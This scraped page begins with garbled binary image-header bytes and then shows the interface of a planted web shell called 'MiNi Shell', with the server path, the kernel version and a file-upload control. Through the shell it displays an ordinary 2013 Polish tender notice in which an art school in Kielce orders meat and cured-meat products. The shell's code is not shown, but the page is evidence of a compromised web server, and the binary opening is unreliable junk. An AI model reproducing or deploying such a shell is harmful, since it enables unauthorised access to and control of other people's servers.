JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130812/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130812/324560-N-2013.html

<p class="kh_header"><b>Kielce: Przedmiotem zamówienia są sukcesywne dostawy produktów zwierzęcych - mięsa  i mięsno wędliniarskich w okresie od 02 września 2013 do 30 czerwca 2014 roku z wyłączeniem okresów ferii zimowych i okresów wolnych od nauki w okolicach Świąt Bożego Narodzenia i Świąt Wielkanocnych</b><br>
<b>Numer ogłoszenia: 324560 - 2013; data zamieszczenia: 12.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Państwowych Szkół Plastycznych , ul. Radiowa 3, 25-314 Kielce, woj. świętokrzyskie, tel. 041 3449065, faks 041 3446804.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: państwowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia są sukcesywne dostawy produktów zwierzęcych - mięsa  i mięsno wędliniarskich w okresie od 02 września 2013 do 30 czerwca 2014 roku z wyłączeniem okresów ferii zimowych i okresów wolnych od nauki w okolicach Świąt Bożego Narodzenia i Świąt Wielkanocnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> produkty mięsno - wędliniarskie 
BALERON DOMOWY Z INDYKA - PRODUCENT NESTEL LUB RÓWNOWAŻNY	KG	50
BALERON GOTOWANY
PRODUCENT JBB LUB RÓWNOWAŻNY 	KG 	50
BATON SZYNKOWY Z DROBIU AVEX PRODUCENT AVEX	KG	50 
BLOK KANAPKOWY
PRODUCENT JBB LUB ROWNOWAŻNY 	KG 	15
FILET WEDZONY Z INDYKA PRODUCENT INDYKPOL LU RÓWNOWAŻNY	KG	50
GULASZ ANGIELSKI
PRODUCENT UNIMIĘS LUB RÓWNOWAŻNY	KG	50
KARCZEK PIECZONY PRODUCENT JBB LUB RÓWNOWAŻNY	KG	30 
KASZANKA PROCUCENT  AVEX LUB RÓWNOWAŻNY  	KG	50
KIEŁBASA FRANCUSKA
JBB LUB RÓWNOWAŻNY 	KG	100
KIEŁBASA KRAKOWSKA
CONSTAR LU RÓWNOWAŻNY 	KG 	100
KIEŁBASA SZYNKOWA PEXPOL LUB RÓWNOWAZNY  	KG	100
KIEŁBASA TORUNSKA
JBB LUB RÓWNIWAŻNY 	KG	150
KIEŁBASA ZIELONOGÓRSKA 
CONSTAR LUB RÓWNOWAŻNY	KG	50
KIEŁBASA ŚLĄSKA KORONA LUB RÓWNOWAŻNY	KG	30
ŁOPATKA PIECZONA JBB LUB RÓWNOWAŻNY 	KG	30 
MIELONKA TYROLSKA PEKSPOL LUB RÓWNOWAZNY  	KG	30
MORTADELA KIELECKA
WIR LUB RÓWNOWAŻNY  	KG	80 
OGONOWKA PEKSPOL LUB RÓWNOWAŻNY 	KG	80
KIEŁBASA PORÓWKOWA  (PARÓWKA GRUBA) 
WIR LUB RÓWNOWAZNY 	KG	100
PARÓWKI ŚLĄSKIE - WINERKI  WIR LUB RÓWNOWAŻNY 	KG 	100
PASZTET DOMOWY 
SOKOŁÓW LUB RÓWNOWAZNY 	KG	80
PIECZEN RZYMSKA
SANDROP LUB RÓWNOWAŻNY 	KG	20
POLĘDWICA DROBIOWA
JANO LUB RÓWNOWAŻNY  	KG	40
POLĘDWICA SOPOCKA
CONSTAR  	KG	100
SCHAB PIECZONY
NESTEL LUB RÓWNOWAŻNY  	KG	50
SCHAB KROTOSZYŃSKI
PEXPOL LUB RÓWNOWAŻNY  	KG	20
SMACZEK JBB LUB RÓWNOWAŻNY 	KG	20
SZYNKA CHŁOPSKA TARCZYŃSKI LUB RÓWNOWAŻNY  	KG	20
SZYNKA KONSERWOWA PEKSPOL LUB RÓWNOWAŻNY  	KG 	80
SZYNKA Z BECZKI JBB  	KG	20
SZYNECZKA Z PIERSI INDYKA JBB 	KG	60
SZYNKA WIEJSKA WIR 	KG	60
ZAWIJANIEC BOCZKOWY
DARPOL 	KG	30
produkty - mięso 
BOCZEK  WĘDZONY	KG	150
BOCZEK SUROWY	KG 	100
SŁONINA	KG	100
FILET Z KURCZAKA	KG 	400
KARCZEK WIEPRZOWY
B/K	KG	150
KORPUS Z KURCZAKA 	KG	130 
KOŚCI KARCZKOWE, SCHABOWE	KG	200
KURCZAK SWIEZY	KG	180
ŁOPATKA WIEPRZOWA B/K	KG	450 
MIĘSO WOŁOWE GULASZOWE	KG 	75
SCHAB WIEPRZOWY B/K	KG	480
SKRZYDŁA Z KURCZAKA	KG	50
SMALEC - KOSTKA	KG	250
SZYNKA WIEPRZOWA B/K	KG	250
UDKO Z KURCZAKA 	KG	380
WĄTRÓBKA DROBIOWA	KG	70
WOLOWINA B/K	KG	160 
WOŁOWINA Z KOŚCIĄ ROSOŁOWĄ	KG	50.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.11.00.00-2, 15.13.11.30-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 02.09.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o wprowadzeniu systemu HACCP lub certyfikat potwierdzający           stosowanie  systemu HACCP,
	aktualne zaświadczenie o wpisie do rejestru zakładów podlegających   
      urzędowej kontroli organów Państwowej Inspekcji Sanitarnej,
	decyzja Państwowego (Powiatowego) Inspektora Sanitarnego o zatwierdzeniu środka transportu do przewozu artykułów będących przedmiotem zamówienia. 
   - ocena spełnienia ww  warunku dokonana zostanie zgodnie 
  z regułą spełnia nie spełnia w oparciu o informacje zawarte 
  w wymaganych oświadczeniach i dokumentach;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi złożyć odpowiednie oświadczenie, 
                                     że w takową wiedzę i doświadczenie ma.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi złożyć oświadczenie, że posiada środki
                                     finansowe lub zdolność kredytową nie mniejszą niż 
                                     kwota brutto oferowanej ceny
                                Wykonawca musi złożyć oświadczenie, że  jest ubezpieczony 
                                     od odpowiedzialności cywilnej w zakresie prowadzonej 
                                     działalności gospodarczej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenie o wprowadzeniu systemu HACCP lub certyfikat potwierdzający         stosowanie  systemu HACCP,
	aktualne zaświadczenie o wpisie do rejestru zakładów podlegających   
      urzędowej kontroli organów Państwowej Inspekcji Sanitarnej,
	decyzja Państwowego (Powiatowego) Inspektora Sanitarnego o zatwierdzeniu środka transportu do przewozu artykułów będących przedmiotem zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.plastyk.kielce.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> bądź na wniosek wykonawcy można ją odebrać  w siedzibie Zamawiającego w budynku Internatu Kielce Al. 1000 - lecia PP nr 18,  pokój numer 5 za odpłatnością w cenie 10,00 zł (z VAT).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.08.2013 godzina 10:00, miejsce: w sekretariacie Zespołu Państwowych Szkół Plastycznych w Kielcach przy ul. Radiowej nr 3 - pokój nr 1 - lub przesłać pocztą na adres zamawiającego..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 20.09.2013.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com